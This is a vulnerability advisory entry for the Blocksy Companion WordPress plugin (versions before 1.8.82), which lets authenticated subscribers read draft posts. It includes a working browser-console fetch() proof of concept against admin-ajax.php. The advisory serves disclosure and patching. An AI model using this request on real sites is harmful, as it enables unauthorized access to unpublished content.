Lucene search

K
wpvulndbWpvulndbWPVDB-ID:E7C52AF0-B210-4E7D-A5E0-EE0645DDC08C
HistoryApr 10, 2023 - 12:00 a.m.

Blocksy Companion < 1.8.82 - Subscriber+ Draft Post Access

2023-04-1000:00:00
wpscan.com
7
plugin vulnerability
unauthorized access
draft posts

0.001 Low

EPSS

Percentile

23.7%

The plugin does not ensure that posts to be accessed via a shortcode are already public and can be viewed, allowing any authenticated users, such as subscriber to access draft posts for example

PoC

Run the below command in the developer console of the web browser while being on the blog as a subscriber user fetch(“/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded”, }, “method”: “POST”, “body”: “action=parse-media-shortcode&shortcode;=[blocksy_posts post_ids=‘518’]”, “credentials”: “include” }).then(response => response.text()) .then(data => console.log(data)); The title and content of the draft post with ID 518 will be displayed in the response

CPENameOperatorVersion
blocksy-companionlt1.8.82

0.001 Low

EPSS

Percentile

23.7%

Related for WPVDB-ID:E7C52AF0-B210-4E7D-A5E0-EE0645DDC08C